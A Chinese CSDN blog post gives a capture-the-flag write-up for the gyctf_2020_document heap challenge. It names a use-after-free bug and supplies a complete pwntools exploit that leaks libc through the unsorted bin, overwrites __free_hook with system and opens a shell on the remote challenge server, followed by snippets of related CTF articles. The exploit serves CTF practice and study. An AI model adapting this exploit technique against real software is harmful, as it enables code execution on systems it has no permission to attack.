gyctf_2020_document

最新推荐文章于 2024-03-27 20:56:58 发布
最新推荐文章于 2024-03-27 20:56:58 发布
阅读量754 收藏
点赞数 1
分类专栏: PWN 文章标签: 安全 学习 unix
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_57754423/article/details/125530968
版权

漏洞点:存在uaf

利用思路:通过free掉size为0x90的堆,然后add,此时会切割free掉的chunk,来作为新chunk的控制结构,此时我们对这些chunk结构是有写权限的,所以写为free_hook即可。

exp:

from pwn import *
from LibcSearcher import *
# r = process("./document")
r = remote('node4.buuoj.cn',29119)
e = ELF("./document")
context.log_level = 'debug'
context.terminal = ['tmux', 'splitw', '-h']
libc = e.libc
libc = ELF('./buu2.23.so')
r.timeout = 0.5
se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims			    :r.recvuntil(delims)
uu32    = lambda data               :u32(ru(data)[-4:].ljust(4, b'\0'))
uu64    = lambda data               :u64(ru(data)[-6:].ljust(8, b'\0'))
info_base = lambda tag, base        :r.info(tag + ': {:#x}'.format(base))
leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))

def dbg(cmd):
	gdb.attach(r,cmd)
	pause()

def add():
	ru(b'Give me your choice :')
	sl(b'1')
	ru(b'input name')
	se(b'/bin/sh\x00'.ljust(8,b'\x00'))
	ru(b'input sex')
	se(b'W')
	ru(b'input information')
	se(b'/bin/sh\x00'.ljust(8,b'\x00')*14)

def edit(index,desc):
	ru(b'Give me your choice :')
	sl(b'3')
	ru(b'Give me your index :')
	sl(str(index).encode())
	ru(b'Are you sure change sex?')
	se(b'Y')
	ru(b'Now change information')
	se(desc)
def delete(index):
	ru(b'Give me your choice :')
	sl(b'4')
	ru(b'Give me your index :')
	sl(str(index).encode())

def show(index):
	ru(b'Give me your choice :')
	sl(b'2')
	ru(b'Give me your index :')
	sl(str(index).encode())

add()#0
add()#1

delete(0)

show(0)
base = uu64(b'\x7f') - 0x3c4b78
leak('base',base)
free_hook = base + 0x3c67a8
leak('free_hook',free_hook)
sys = base + libc.sym['system']

shell = [0x45226,0x4527a,0xf03a4,0xf1247]

add()#2
add()#3
pl1 = b'a'*0x8 + p64(0x21) + p64(free_hook-0x10) + p64(0x1)
pl1 += b'a'*0x8 + p64(0x51) + b'a'*0x40
edit(0,pl1)
pl2 = p64(sys) + b'/bin/sh\x00'.ljust(8,b'\x00') + p64(0x0000000100000000) + b'\x00'*0x58
edit(3,pl2)
# leak('hook',base+shell[0])
# add()
delete(2)



r.interactive()

cut_maize
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【pwn】 gyctf_2020_borrowstack
Nothing
03-02 1613
例行检查 程序逻辑 看到buf缓冲区有0x10大小溢出,且可以控制bss段上的bank,可以用栈迁移做,这题的bss段离got表较近,在迁移时尽量往高地址迁移,防止在rop时破坏got表上数据。 from pwn import * io=remote('node3.buuoj.cn','29302') bank=0x0601080 leave=0x400699 puts_plt=0x0400...
EDEM_2020_help document.rar
03-19
EDEM_2020_help document
gyctf_2020_borrowstack 1
最新发布
weixin_74861133的博客
03-27 321
在read buf处存在栈溢出漏洞,但只能溢出8字节,而后面有向bss段bank处读入数据,我们就可以通过栈迁移,借用bank处的bss段构建栈,但因为该bss段距离.got.plt段非常近,所以要通过在bank处构建的payload时先填充20个ret指令的地址从而实现抬高栈,这样就不会覆盖到got表处了,抬高20个可能是因为后面又要回到main函数,而main函数中要执行sub esp 60h这样如果没有抬栈就会由于主函数中的操作将got段覆盖掉。该题还有一个就是用了一个工具one_gadget。
gyctf_2020_document(uaf)
m0_51251108的博客
11-14 988
gyctf_2020_document: 保护全开 漏洞分析: delete函数里指针未清零 大致思路: 这题限制了add时chunk的size,为0x8和0x80,edit时只能从+0x10处改0x70个字符 1.先add一个chunk,在add一个chunk,这个chunk里的name填/bin/sh\x00 (这时0x8chunk中存有指向binsh地址的指针了),我们释放第一个chunk,由于0x80大小,释放到unsortbin中,我们show,就能泄露libc 2.我们接下来的目的是控制申请
[BUUCTF]PWN——gyctf_2020_document(UAF)
mcmuyanga的博客
03-22 718
gyctf_2020_document 例行检查,64位程序,保护全开 漏洞在free chunk的时候 简单看一下其他几个功能函数 add() 像我这样的新手,可以申请几个chunk看一下,方便理清楚堆的内部情况 show(),根据存放在bss段的0x202060堆指针数组来输出对应的chunk里的值 edit() 利用思路 申请一个chunk,释放掉,在show,由于存在uaf,这样就泄露了libc 泄露libc后,由于第一个chunk被释放了,并且edit函数编辑的是chun
[GYCTF2020]Blacklist
weixin_52268949的博客
01-26 2346
[GYCTF2020]Blacklist(堆叠注入) 补充知识点 desc查看表结构的详细信息 desc table_name; PS:此处desc是describe的缩写,用法: desc 表名/查询语句 desc降序排列数据 select ename,sal from emp order by sal desc; 手动指定按照薪水由大到小排序(降序关键字desc) select ename,sal from emp order by sal asc; 手动指定按照薪水由小到大排序(升序关键字asc) P
h_document_add.rar_h_document_add
09-20
描述了在CCS中添加H文件时出现的一些异常问题和解决方法
TSP.rar_tsp document
09-24
Document about traveling salesmen problem
Java_debug_Document.rar_Java_debug_Document
09-19
JAVA调试实用手册,很好用的了,学习java的可以下载
java_HELP_DOCUMENT.rar_java help document
09-24
很好用的Java帮助文档,包含了所有常见的java函数的用法,属性,各种类等,是从事java开发必备的工具
BUUCTF【gyctf_2020_force】(house of force)
weixin_51055545的博客
01-29 631
一道题学习 House of force 首先说明一下House of force的利用条件: 1.能够通过堆溢出等方法控制到topchunk的size 2.分配的大小没有限制,即可以申请任意大小的堆块 3.能够泄露出堆地址(topchunk) House of force 产生的原因: 在于 glibc 对 top chunk 的处理,进行堆分配时,如果所有空闲的块都无法满足需求,那么就会从 top chunk 中分割出相应的大小作为堆块的空间。若 top chunk 的 size 值是由用户控制的任意的
GYCTF2020_Writeup
Lethe's Blog
03-15 2520
Blacklist 一到注入题,和2019强网杯的随便住基本一致,但是多过滤了set、prepare、alter、rename: return preg_match("/set|prepare|alter|rename|select|update|delete|drop|insert|where|\./i",$inject); 获取表名和列名的方式与原题一致,而获取数据可以参考这篇文章:http...
gyctf_2020_borrowstack
、moddemod
07-08 379
注意上图,因为bss与got表位置比较近,所以要尽可能的抬高栈顶指针即rsp,不然在后续调用其他函数的时候,会因为一些push操作或者sub使得栈顶指针减小覆盖到got中的内容导致无法泄露libc或者使得程序无法正常运行… from pwn import * from LibcSearcher import * context.log_level = 'debug' proc_name = './gyctf_2020_borrowstack' p = process(proc_name) p = r..
re学习笔记(40)i春秋2020 GYCTF-re-吃鸡神器
逆向随笔
02-22 708
新手一枚,如有错误(不足)请指正,谢谢!! 个人博客:点击进入 题目描述: 卢姥爷收到了朋友发来的“吃鸡神器”,但是朋友忘了告诉他登录账户和密码,⽽且卢姥爷也不好意思去问。所以 请为卢姥爷以 “lubenwei” 为⽤户名注册个账户。flag格式为 “flag{对应密码}” 题目下载: 链接: https://pan.baidu.com/s/1gVE158CY6VmSV4qUwtXXqA 提...
[GYCTF2020]Ezsqli
m0_56059226的博客
08-25 227
简单试了试,输入1返回是Nu1L,输入'返回的是bool(false),发现是布尔盲注,先fuzz一下,发现for是被过滤了的,也就是不能用information_schema了,这时我们就不能通过这个库来查出表名和列名。不过我们可以通过两种方法来查出表名: InnoDb引擎 从MYSQL5.5.8开始,InnoDB成为其默认存储引擎。而在MYSQL5.6以上的版本中,inndb增加了innodb_index_stats和innodb_table_stats两张表,这两张表中都存储了数据库和其数据表的信息
ctf up怎么写 write_document.write 作用
weixin_29549793的博客
12-28 130
本文为饥人谷原创文章,首发于 前端学习指南有人说页面加载完毕前调用 document.write 就不清空,调用完再调用 document.write 就会清空,是这样吗当你打开一个页面,浏览器会调用 document.open() 打开文档document.write(...) 将下载到的网页内容写入文档所有内容写完了,就调用 document.close()触发 dom ready 事件(DO...
DOCUMENT_TAX_BSET
07-27
引用\[1\]:在引用中提到了一个名为"DOCUMENT_TAX_BSET"的问题,但是没有提供具体的信息。请提供更多关于"DOCUMENT_TAX_BSET"的上下文或者具体问题,以便我能够为您提供更准确的答案。 #### 引用[.reference_title] -...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值